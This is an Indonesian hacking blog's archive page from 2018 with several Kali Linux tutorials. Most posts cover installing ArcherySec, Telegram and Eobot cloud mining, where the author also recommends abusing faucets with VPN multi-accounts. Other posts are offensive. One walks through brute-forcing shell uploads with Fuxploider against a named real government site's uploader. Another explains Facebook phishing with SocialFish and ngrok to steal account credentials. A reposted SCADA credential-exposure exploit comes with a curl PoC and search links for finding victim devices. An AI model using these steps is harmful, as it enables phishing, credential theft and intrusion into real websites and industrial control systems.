No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation

Blog Archive



Seal

Always Trust Yourself And Use Your Opportunity



Selasa, 29 Mei 2018

Kali Linux : Setting Archerysec Vulnerability Assessment and Management Tool



Halo kang coli kembali lagi dengan gw yukinoshita 47 kali ini gw mau share tutorial lagi wkwkwkwkwkwk oke langsung saja pada inti nya

Archerysec adalah tool management berbasis web untuk mangaudit celah keamanan Archerysec menggunakan tool opensource populer untuk melakukan pemindaian komprehensif untuk aplikasi web dan jaringan. 

Archerysec Ini juga melakukan pemindaian otentikasi dinamis aplikasi web dan mencakup seluruh aplikasi dengan menggunakan selenium dan juga dapat memanfaatkan alat untuk implementasi lingkungan DevOps CI / CD mereka.

berikut ini kerangka atau architecture dari tool ini



baiklah gays langsung saja kita mulai step by step nya

pertama buka dulu terminal


kemudian clone tools nya dari github dengan menggunakan perintah

git clone https://github.com/archerysec/archerysec.git

kemudian tekan enter


setelah itu masuk ke direktori archerysec nya dengan menggunakan perintah

cd archerysec

kemudian tekan enter


install module dan dependencies nya agar tool ini berjalan dengan baik dengan menggunakan perintah

pip install -r requirements.txt

kemudian tekan enter


biarkan proses install module dan dependencies nya berjalan hingga selesai


kemudian jalankan tools nya dengan menggunakan perintah

./run.sh

kemudian tekan enter


dan maka akan muncul server nya contoh disini server nya http://0.0.0.0:8000/


lalu akses http://0.0.0.0:8000/ di browser


lalu pilih sign up dan isi username, email, dan password kalian lalu klik lagi sign up

contoh :

username : root
email : root@localhost.io
password : toor
confirm password : toor


kemudian login dengan akun sesuai yang kalian daftar tadi disini gw login dengan akun username : root password : toor


dan berhasil ini lah penampakan interface tool nya


untuk menutup nya cukup logout >> close browser nya >> dan tekan CTRL + C di terminal

oke cukup sampai disini dulu tutorial nya mungkin akan ada tutorial lanjutan nya stay tuned aja wkwkwkwkwkwk

Tetaplah bersama dan saling membantu :*


Senin, 28 Mei 2018

Kali Linux : Cara Install Telegram


Halo kang coli wkwkwkwk coli mulu kerjaan lu udah berhenti dulu coli nya kali ini gw Yukinoshita 47 HAMBA ALLAH YANG MENCARI RIDHO NYA mau sharing tutorial sederhana yaaa buat ngisi blog aja biar suasana blog hidup gitu :v

kali ini gw mau share tutorial Install Telegram lumayan buat nuyul-nuyul airdrop bitcoin wkwkwkwkwkwkwkwk

pertama buka web resmi Telegram nya di https://telegram.org/ 

trus lu download Software nya kalo gw disini pake Kali Linux 64 Bit jadi gw download yang 64 bit aja



setelah itu buka file manager dan masuk ke direktori file telegram yang di download tadi kalo gw disini letaknya di Folder Download setelah itu gw klik kanan file nya trus extract


maka akan muncul seperti gambar dibawah ini


 langsung aja masuk ke folder nya setelah itu klik kanan dan pilih Open In Terminal untuk membuka terminal


 dan terminal pun muncul wkwkwkwkw


kita copy aja file Telegram dan Updater nya ini ke folder /usr/bin nya

dengan memasukkan perintah

cp Telegram Updater /usr/bin

kemudian tekan enter


setelah itu beri hak ases kepada file Telegram dan Updater yang dicopy tadi agar bisa dijalankan software nya dengan menggunakan perintah

chmod +x /usr/bin/Telegram

kemudian tekan enter


setelah itu kita berikan juga hak akses di file updater nya dengan menggunakan perintah yang sama

chmod +x /usr/bin/Updater

kemudian tekan enter


setelah itu untuk menjalankan software telegram ini cukup memasukkan perintah Telegram saja di terminal kemudian tekan enter


dan telegram pun berhasil dijalankan dan siap untuk digunakan :v


baiklah cukup sampai disini aja tutorial nya lebih dan kurang mohon maaf dan maklumin aja wkwkwkwkkwkw


sekian dan terimakasih



Selasa, 22 Mei 2018

Kali Linux : Arbitrary File Upload Vulnerability Scanning Dengan Fuxploider


Hai gays kembali lagi bersama gw yukinoshita47 kali ini gw mau share tutorial lagi kali ini tutorial tentang Vulnerability Analysis yang mungkin cocok buat wajah-wajah tukang upload shell kayak lu pade wkwkwkwkwkwk

oke langsung aja

pertama buka terminal



kemudian download tools nya dari github dengan menggunakan perintah

git clone https://github.com/almandin/fuxploider

kemudian tekan enter



kemudian masuk ke dalam direktori tools nya dengan menggunakan perintah

cd fuxploider

kemudian tekan enter



kemudian install dulu python3-pip nya

khusus untuk kali linux versi lama atau versi dibawah tahun 2018

gunakan perintah

apt-get install python3-pip

kemudian tekan enter

---

khusus untuk kali linux 2018 dan yang terbaru

gunakan perintah

apt install python3-pip

kemudian tekan enter





kemudian install dependencies nya dengan menggunakan perintah

pip3 install -r requirements.txt

kemudian tekan enter


setelah selesai install dependencies nya
jalankan tools nya dengan menggunakan perintah

python3 fuxploider.py

kemudian tekan enter

untuk melihat informasi tools gunakan perintah

python3 fuxploider.py -h

kemudian tekan enter



lalu bagaimana cara gunakan tools nya untuk uji coba target nya ?

kita test

cara nya gunakan perintah

python3 fuxploider.py --url http://situstarget.com/letak-file-upload.php --not-regex "wrong file type"

contoh

python3 fuxploider.py --url http://www.itjen.depkes.go.id/public/filemanager/img/ico_dark/uploader.php --not-regex "wrong file type"

kemudian tekan enter maka tool nya akan coba validasi extensi file yang akan di upload



tekan y untuk coba bruteforce upload file shell nya


contoh jika bruteforce upload shell nya berhasil akan muncul seperti gambar dibawah ini


oke cukup sampai disini tutorial kali ini gays kalo ada salah dan kurang dimaklumi aja gays  sampai jumpa di tutorial selanjutnya

sekian dan terimakasih

regard

Drs. Yukinoshita47. HAMBA ALLAH YANG MENCARI RIDHO NYA

Sabtu, 19 Mei 2018

Kali Linux : Tutorial Phising Menggunakan SocialFish yang Terintregasi Langsung Oleh Ngrok


hai gay's halo anjing wkkwkwkwk kembali lagi ama gw Yukinoshita 47kali ini gw membuat tutorial lagi kali ini gw bikin tutorial hack akun social media melalui phising dengan Social Fish oke langsung saya kita mulai

kali ini gw menggunakan Platform OS nya Kali Linux 2018.2 akhirnya gw bisa move on dari Kali Linux 1.1.0 a wkwkwkwkwkwk

pertama buka terminal lu


kemudian masukkan perintah

git clone https://github.com/UndeadSec/SocialFish.git

kemudian tekan enter



masuk ke folder SocialFish nya dengan memasukkan perintah

cd SocialFIsh

kemudian tekan enter


install dependencies yang dibutuhkan tool ini dengan menjalankan perintah

pip install -r requirements.txt

kemudian tekan enter


proses instalasi selesai
setelah itu jalankan tools nya  dengan memasukkan perintah

python SocialFish.py

kemudian tekan enter


setelah konfigurasi nya selesai maka akan muncul seperti gambar dibawah ini

disini tool ini memberitahukan kita bahwa kita harus setuju bahwa penggunaan tools ini hanya untuk pembelajaran dan hanya sekedar mencari ilmu pengetahuan aja bukan untuk kejahatan.

jika ingin lanjut tekan y kemudian tekan enter



disini ada 7 pilihan phising yang bisa kita gunakan

ada Facebook, Twitter, Google, LinkedIn, StackOverflow, Github dan Wordpress

untuk contoh gw mau menggunakan phising facebook

jadi gw tekan 1 kemudian tekan enter


disini ada 2 pilihan jadi gw pilih yang nomor pertama aja dengan cara menekan 1 kemudian tekan enter


kemudian link phising nya berupa ngrok URL akan muncul lebih detail nya cek gambar dibawah ini.


setelah itu kita uji coba link nya ternyata aktif dan siap untuk disebar wkwkwkwkwkwkwk


kita test login disini gw mencoba menggunakan username : korban password nya : phising


dan username dan password akun nya pun kerekam dan muncul di log nya.

 


Mudahkan , menurut gw phising metode ini sangat efektif dan cukup canggih

oke sampai jumpa di tutorial-tutorial berikut nya terimakasih.

Exploit: SCADAS "BAS920 & ISC2000": Credentials Exposed


[*] Exploit Title: "SCADAS "BAS920 & ISC2000"; Credentials Exposed”
[*] CVE: CVE-2017-17974
[*] Date: 29/12/2017
[*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
[*] Vendor: BA System
[*] devices(tested): BAS920 & ISC2000



PoC:
curl http://<host>/isc/get_sid_js.aspx
tool
usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git
usr@pwn:~$ cd baCK_system
usage
usr@pwn:~/$ python plinplanplum.py --help
python plinplanplum.py --help
usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining all credentials for the Supervisor/Administrator account
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81
Search Devices vicitms:
https://www.zoomeye.org/searchResult?q=HTTPserv&t=host
https://github.com/ezelf/baCK_system

From : https://www.facebook.com/Ksecureteam/

Rabu, 09 Mei 2018

Trik Nambang Bitcoin dan Altcoin Tanpa Modal Via Eobot


 Hai gays :v kali ini gw mau share sesuatu yang berbeda yaitu mengenai seluk beluk nya crypto currency apa itu crypto currency penjelasan detail nya nanti di artikel2 lainnya.

artikel kali ini adalah mengenai nambang bitcoin :v kali ini nambang bitcoin metode cloud mining yang umum nya harus invest tapi di eobot kita juga bisa nambang tanpa harus ngeluarin modal bagaimana cara nya simak langkah-langkah nya

Pertama kalian harus punya wallet / dompet buat nampung coin kalian bisa kalian bikin wallet melalui https://coinbase.com , https://indodax.com/ atau penyedia layanan wallet lainnya

Registrasi Akun Eobot kalian dulu disini https://bit.ly/2jKwGh6

setelah itu pilih mining lalu pilih GHS 4.0


lalu akan muncul seperti gambar dibawah ini


kemudian pilih faucet


isi captcha lalu klik Get Faucet Reward


dan kalian langsung dapat GHS4CONTRACT nya seperti gambar dibawah ini


lalu pilih account


kemudian pilih mining dan pilih jenis coin yang ingin kalian tambang misalnya disini gw mau nambang DOGE maka gw pilih DOGE


dan proses nambang DOGE pun berjalan dengan kecepatan nambang nya sesuai dengan jumlah GHS4CONTRACT yang dimiliki


setelah itu kalian bisa logout dan tinggalin aja karena nambang dari cloud ini berjalan secara otomatis dan lakukan trik ini setiap hari agar bisa cepat WD.

apakah bisa dituyul ??
ya bisa dituyul pastikan kalian menggunakan VPN sehingga tiap akun IP nya berbeda agar pengambilan faucet nya lancar.

oke sampai disini dulu artikel tentang crypto currency nya dan tentu saja akan ada artikel dan informasi lainnya yang akan diupdate secara berkala

sekian dan terimakasih